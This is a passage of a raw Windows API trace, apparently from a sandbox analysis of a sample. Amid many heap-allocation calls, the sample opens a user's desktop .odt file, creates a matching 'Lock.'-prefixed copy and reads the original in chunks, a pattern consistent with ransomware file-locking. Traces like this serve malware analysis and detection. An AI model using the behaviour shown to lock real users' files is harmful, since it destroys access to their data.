(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69970 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0100.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0100.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0100.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0100.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0100.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0100.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0100.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0100.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aae878 [0100.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0100.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0100.308] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/ERgdUGLd4HevVs5.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\ergdugld4hevvs5.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0100.308] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.308] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0100.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0100.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0100.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0100.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0100.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0100.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0100.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0100.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0100.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0100.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0100.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0100.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0100.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0100.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0100.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0100.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75f60 [0100.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0100.309] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0100.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75f60 | out: hHeap=0x2af0000) returned 1 [0100.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0100.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0100.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0100.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0100.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0100.310] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.ERgdUGLd4HevVs5.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.ergdugld4hevvs5.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0100.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0100.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0100.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0100.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0100.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0100.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0100.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0100.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0100.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0100.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0100.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0100.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0100.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0100.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0100.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0100.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0100.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0100.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0100.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0100.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0100.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0100.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0100.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0100.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0100.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0100.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0100.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cad020 [0100.314] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0100.314] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0100.317] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x1fe4, lpOverlapped=0x0) returned 1 [0100.317] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0100.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0100.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0100.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0100.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11fe4) returned 0x2a7a130 [0100.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cad020 | out: hHeap=0x2af0000) returned 1 [0100.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0100.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0100.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0100.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0100.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0100.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0100.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0100.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11fe4) returned 0x2a8c120 [0100.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0100.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.324] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0100.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0100.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0100.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11fe4) returned 0x2a7a130 [0100.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0100.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0100.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0100.326] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0100.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0100.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0100.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0100.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0100.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0100.326] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.326] RtlAllocateHeap 